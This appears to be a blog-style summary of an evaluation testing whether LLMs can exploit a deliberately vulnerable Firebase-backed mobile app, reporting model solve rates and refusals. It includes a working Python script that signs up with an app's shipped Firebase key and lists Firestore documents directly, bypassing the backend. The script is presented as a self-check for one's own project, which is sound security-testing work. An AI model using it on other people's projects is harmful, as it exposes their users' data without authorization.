I built a vulnerable app and spent $1,500 seeing if LLMs could hack it
3 hours ago
- #Firebase Exploit
- #AI Evaluation
- #LLM Security Testing
- The author built a deliberately vulnerable React Native Expo app with a Python FastAPI backend and Firebase to test whether LLMs could exploit common security flaws.
- The exploit used the Firebase credentials shipped in the app to sign up directly and read Firestore, bypassing the secure API entirely. This is a common real-world issue.
- GPT-5.5 had the highest solve rate (7/10) and focused on Firebase quickly, while other models such as DeepSeek V4 Pro (3/10) and the Claude variants (2/10) succeeded less often.
- Several models (e.g., Gemini 3.1 Pro Preview, DeepSeek V4 Flash) failed because of refusals or misdirected effort, with some fixating on API exploits instead of Firebase.
- The experiment cost $1,500 and surfaced several challenges: model guardrails, high costs with some providers, and technical hurdles in running the evaluation harness.
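
The direct-access path in the summary above (sign up with the app's own Firebase credentials, then read Firestore without touching the API) can be sketched against Firebase's public REST endpoints. This is a minimal sketch for checking a project you own, not the author's harness: the API key, project ID, and the `users` collection name are placeholder assumptions, and the helper names are hypothetical. The builder functions only construct requests; nothing is sent until `check_direct_access` is called.

```python
import json
import urllib.request

# Placeholders (assumptions, not taken from the article).
API_KEY = "YOUR_FIREBASE_WEB_API_KEY"  # the web API key bundled in the client app
PROJECT_ID = "your-project-id"
COLLECTION = "users"                   # hypothetical collection name


def build_signup_request(api_key, email, password):
    """Build an email/password sign-up request for the Firebase Auth REST API."""
    url = f"https://identitytoolkit.googleapis.com/v1/accounts:signUp?key={api_key}"
    body = json.dumps(
        {"email": email, "password": password, "returnSecureToken": True}
    ).encode("utf-8")
    return urllib.request.Request(
        url,
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def build_firestore_list_request(project_id, collection, id_token):
    """Build a request that lists documents in a collection via the Firestore REST API."""
    url = (
        f"https://firestore.googleapis.com/v1/projects/{project_id}"
        f"/databases/(default)/documents/{collection}"
    )
    return urllib.request.Request(
        url,
        headers={"Authorization": f"Bearer {id_token}"},
        method="GET",
    )


def send(request):
    """Send a request and decode the JSON response (raises HTTPError on 4xx/5xx)."""
    with urllib.request.urlopen(request, timeout=10) as response:
        return json.loads(response.read().decode("utf-8"))


def check_direct_access(api_key, project_id, collection, email, password):
    """Sign up a throwaway account, then try to list documents directly.

    If the security rules are locked down, the second call raises
    urllib.error.HTTPError (typically 403) instead of returning documents.
    """
    signup = send(build_signup_request(api_key, email, password))
    listing = send(
        build_firestore_list_request(project_id, collection, signup["idToken"])
    )
    return listing.get("documents", [])
```

If `check_direct_access` returns documents for a freshly created account, the Firestore security rules are granting read access to any signed-in user, so whatever checks the backend API enforces are not protecting that data.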